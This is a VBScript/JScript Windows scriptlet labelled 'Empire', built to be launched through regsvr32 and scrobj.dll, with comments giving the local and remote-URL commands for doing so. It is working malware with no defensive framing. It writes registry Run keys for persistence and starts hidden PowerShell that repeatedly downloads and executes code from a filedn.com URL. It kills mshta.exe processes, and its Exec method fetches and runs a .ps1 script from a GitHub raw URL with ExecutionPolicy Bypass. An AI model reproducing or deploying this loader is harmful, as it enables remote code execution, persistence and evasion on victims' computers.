<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
	>
	<!-- regsvr32 /s /i"C:\Bypass\o_MsgBox.sct" scrobj.dll -->
	<!-- regsvr32 /s /i:http://server/o_MsgBox.sct scrobj.dll -->
	<!-- That should work over a proxy and SSL/TLS... -->
	<!-- Credits Of Concept - al -murtadin  -->
	<script language="VBScript">
		<![CDATA[
		
		  CreateObject("Wscript.Shell").regwrite "HKCU\Software\?", "?" , "REG_SZ"
set O = CreateObject("Wscript.Shell")
U=O.ExpandEnvironmentStrings("%windir%")
O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\?", U & "?" , "REG_SZ"
 Set ws=CreateObject("WScript.Shell")
ws.Run "cmd.exe /c start /min powershell -ExecutionPolicy Bypass -w hidden -c while($true){IEX((new-object net.webclient).downloadstring('https://filedn.com/l8WR7CI6Fagp3rvpUCNMA54/stub_pwshll.txt'))}", 0, vbhide
 
Dim objWMIService : Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Dim colProcesses : Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process")
Dim objProcess
For Each objProcess In colProcesses    
    if (objProcess.name = "mshta.exe") then
        Set objShell = CreateObject("WScript.Shell")
        strCmd="TaskKill /f /im " & objProcess.name 
        objShell.Run strCmd,0,True
    end if
Next
    
		]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	
	function Exec()
	{

    w = new ActiveXObject("WScript.Shell");
		h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
		h.Open("GET","https://raw.githubusercontent.com/riyantigomez/gomez22/master/00.ps1",false);
		h.Send();
		c = h.ResponseText;
		ps = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command ';
		r = new ActiveXObject("WScript.Shell").Exec(ps + c);
   
   
	}
	
]]>
</script>

</scriptlet>
